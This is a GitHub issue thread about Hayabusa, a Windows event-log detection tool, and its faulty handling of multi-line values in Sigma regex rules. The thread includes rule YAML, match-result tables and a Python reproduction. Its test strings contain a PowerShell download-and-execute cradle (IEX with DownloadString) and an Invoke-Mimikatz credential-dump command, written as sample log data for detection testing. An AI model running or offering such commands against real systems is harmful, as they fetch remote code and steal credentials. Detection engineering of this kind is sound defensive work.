Closed fukusuket closed 11 months ago
I found another issue. According to the Sigma documentation below, regular expressions are expected to be case-insensitive. https://github.com/SigmaHQ/sigma-specification/blob/main/Sigma_specification.md#general
> - Regular expressions are case-sensitive by default
However, if I create a detection rule with lowercase letters as shown below, there will be 0 detection results.
```yaml
...
detection:
    selection:
        Channel|re: 'windows powershell'
        EventID: 400
    condition: selection
falsepositives:
tags:
references:
ruletype: Hayabusa
```
(In the case above, it will be detected correctly if I change to `Channel|re: 'Windows PowerShell'`.)
Sorry ... 🙇 The above https://github.com/Yamato-Security/hayabusa/issues/1211#issuecomment-1801888079 case was correct behavior, because case-sensitivity is the expected behavior.
@fukusuket Yes, I think normal wildcard matching, etc... is case-insensitive but only regex is case-sensitive.
@YamatoSecurity I checked the reproduction conditions using the code below! https://play.rust-lang.org/?version=stable&mode=debug&edition=2021&gist=54185c82df86fcd2077408f9dc90fa0a
The match result for a string without line breaks is as follows:
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://example.com');"
```

| Regex | Match |
|---|---|
| `powershell.*` | true |
| `powershell` | false |
| `.*DownloadString.*` | true |
The match result for a string with line breaks is as follows:
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://example.com');
Invoke-Mimikatz -DumpCreds"
```

| Regex | Match |
|---|---|
| `powershell.*` | false |
| `powershell` | false |
| `.*DownloadString.*` | false |
Based on the above results, the reproduction conditions are as follows: the `|re` rule will not match.

The pseudo code for https://github.com/Yamato-Security/hayabusa/pull/1212 is below. The results after applying https://github.com/Yamato-Security/hayabusa/pull/1212 are as follows. https://play.rust-lang.org/?version=stable&mode=debug&edition=2021&gist=82a1019add2b410ec720d4f74c0d10ef
The match result for a string without line breaks is as follows:
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://example.com');"
```

| Regex | Match |
|---|---|
| `powershell.*` | true |
| `powershell` | true |
| `.*DownloadString.*` | true |
The match result for a string with line breaks is as follows:
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://example.com');
Invoke-Mimikatz -DumpCreds"
```

| Regex | Match |
|---|---|
| `powershell.*` | true |
| `powershell` | true |
| `.*DownloadString.*` | true |
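The two result tables above are consistent with a whole-value, single-line regex match before the fix and an unanchored search in which `.` also matches a newline after it. The following is an added Python example (not Hayabusa's Rust code, and the before/after semantics are an assumption drawn from the tables) that reproduces both tables on the thread's two sample strings and also checks that the `|re` match stays case-sensitive as the Sigma specification requires.

```python
import re

# Constructed sample event data: the two cases quoted in the thread,
# one without a line break and one with a line break.
SINGLE_LINE = (
    "powershell.exe \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://example.com');\""
)
MULTI_LINE = (
    "powershell.exe \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://example.com');\n"
    "Invoke-Mimikatz -DumpCreds\""
)
PATTERNS = ["powershell.*", "powershell", ".*DownloadString.*"]


def match_full_single_line(pattern: str, value: str) -> bool:
    """Assumed pre-fix semantics: the regex must cover the whole value
    and '.' does not match a newline. Reproduces the 'before' tables."""
    return re.fullmatch(pattern, value) is not None


def match_search_dotall(pattern: str, value: str) -> bool:
    """Assumed post-fix semantics: unanchored search, with '.' matching
    newlines, so a hit anywhere in the value counts. Case-sensitive
    matching is kept, as the Sigma spec expects for regular expressions."""
    return re.search(pattern, value, re.DOTALL) is not None


def result_table(matcher, value: str) -> dict:
    """Evaluate every pattern from the thread against one value."""
    return {p: matcher(p, value) for p in PATTERNS}


if __name__ == "__main__":
    for name, value in (("single line", SINGLE_LINE), ("multi line", MULTI_LINE)):
        print(f"[{name}] full-match, single-line:",
              result_table(match_full_single_line, value))
        print(f"[{name}] search, dotall:          ",
              result_table(match_search_dotall, value))
    # Regex matching stays case-sensitive: this mirrors the
    # 'windows powershell' vs 'Windows PowerShell' case from the thread.
    print("lowercase regex on 'Windows PowerShell':",
          match_search_dotall("windows powershell", "Windows PowerShell"))
```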
**Describe the bug**

`|re` modifier rule not detected correctly.

**Step to Reproduce**

test.yml
```yaml
title: 'PwSh Engine Started'
description: 'Engine state is changed from None to Available.'
id: ac2ae63b-83e6-4d06-aeaf-07409bda92c9
level: informational
status: test
logsource:
    product: windows
    service: powershell
detection:
    selection:
        Channel: 'Windows PowerShell'
        EventID: 400
    filter:
        Data|re: 'NewEngineState'
    condition: selection and filter
falsepositives:
tags:
references:
ruletype: Hayabusa
```